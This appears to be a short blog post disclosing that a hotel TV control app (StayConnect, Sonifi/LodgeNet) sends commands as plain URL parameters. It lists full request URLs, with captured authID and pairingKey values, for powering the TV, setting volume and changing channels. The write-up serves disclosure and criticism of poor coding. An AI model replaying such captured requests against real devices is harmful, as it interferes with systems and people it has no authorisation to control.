Hijacking a Sonifi Hotel TV

The TV in my hotel room this week advertised how easy it is to control it with the stayconnect app.  So I downloaded it and was pretty impressed by how well it worked…. until I remembered my phone was still on 4G and VPNed through a server in Europe.
2016-05-08 16.35.47
So I fired up Burp Suite to see exactly what was going on.  To my surprise the app wasn’t posting the data like it should it was passing it as part of the URL string:
https://rci.lodgenet.com/mobile.php?method=tvOff&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a 
Here is a terrible proof of concept video I shot in my room:

Here are some of the commands I found to control the tv:
TV Power Off: 
https://rci.lodgenet.com/mobile.php?method=tvOff&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a
TV Power On: 
https://rci.lodgenet.com/mobile.php?method=tvOn&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a
Mute Sound:
https://rci.lodgenet.com/mobile.php?method=tvVolume&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&volumeLevel=0
Max Sound:
https://rci.lodgenet.com/mobile.php?method=tvVolume&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&volumeLevel=30
Change Channel:
https://rci.lodgenet.com/mobile.php?method=tuneTV&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&channelID=8
https://rci.lodgenet.com/mobile.php?method=tuneTV&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&channelID=7
While not a major vulnerability and to exploit it you would have to capture traffic from your victim’s phone it does show really poor programming practices.

Site Footer